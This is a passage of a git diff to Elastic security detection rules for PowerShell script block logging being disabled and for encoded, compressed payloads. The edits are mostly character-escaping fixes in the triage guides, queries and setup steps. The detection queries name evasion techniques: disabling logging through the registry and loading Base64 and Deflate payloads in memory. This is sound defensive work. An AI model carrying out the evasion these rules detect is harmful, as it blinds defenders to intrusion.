[ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_106.json b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_106.json index bcf65adfa5e..9ae724e07e5 100644 --- a/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_106.json +++ b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_106.json @@ -17,7 +17,7 @@ "note": "## Triage and analysis\n\n### Investigating PowerShell Script Block Logging Disabled\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making it available in various environments and creating an attractive way for attackers to execute code.\n\nPowerShell Script Block Logging is a feature of PowerShell that records the content of all script blocks that it processes, giving defenders visibility of PowerShell scripts and sequences of executed commands.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense for the user to use PowerShell to complete tasks.\n- Investigate if PowerShell scripts were run after logging was disabled.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\"\n ) and registry.data.strings : (\"0\", \"0x00000000\")\n", "references": [ - "https://admx.help/?Category=Windows_10_2016\u0026Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" + "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" ], "related_integrations": [ { @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_107.json b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_107.json index 5304bbd83af..aec97aede2f 100644 --- a/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_107.json +++ b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_107.json @@ -17,7 +17,7 @@ "note": "## Triage and analysis\n\n### Investigating PowerShell Script Block Logging Disabled\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making it available in various environments and creating an attractive way for attackers to execute code.\n\nPowerShell Script Block Logging is a feature of PowerShell that records the content of all script blocks that it processes, giving defenders visibility of PowerShell scripts and sequences of executed commands.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense for the user to use PowerShell to complete tasks.\n- Investigate if PowerShell scripts were run after logging was disabled.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\"\n ) and registry.data.strings : (\"0\", \"0x00000000\")\n", "references": [ - "https://admx.help/?Category=Windows_10_2016\u0026Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" + "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" ], "related_integrations": [ { @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_105.json b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_105.json index 55ba193b906..e60604bdbc5 100644 --- a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_105.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Suspicious Payload Encoded and Compressed", - "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"System.IO.Compression.DeflateStream\" or\n \"System.IO.Compression.GzipStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GzipStream\"\n ) and\n FromBase64String\n ) and not user.id : \"S-1-5-18\"\n", "related_integrations": [ { @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_106.json b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_106.json index 5b0878a97b9..ab082c8b4ef 100644 --- a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_106.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Suspicious Payload Encoded and Compressed", - "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"System.IO.Compression.DeflateStream\" or\n \"System.IO.Compression.GzipStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GzipStream\"\n ) and\n FromBase64String\n ) and not \n (user.id:(\"S-1-5-18\" or \"S-1-5-19\") and\n file.directory: \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\Downloads\")\n", "related_integrations": [ { @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_107.json b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_107.json index 98761624018..14941999bc8 100644 --- a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_107.json +++ b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_107.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Suspicious Payload Encoded and Compressed", - "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path 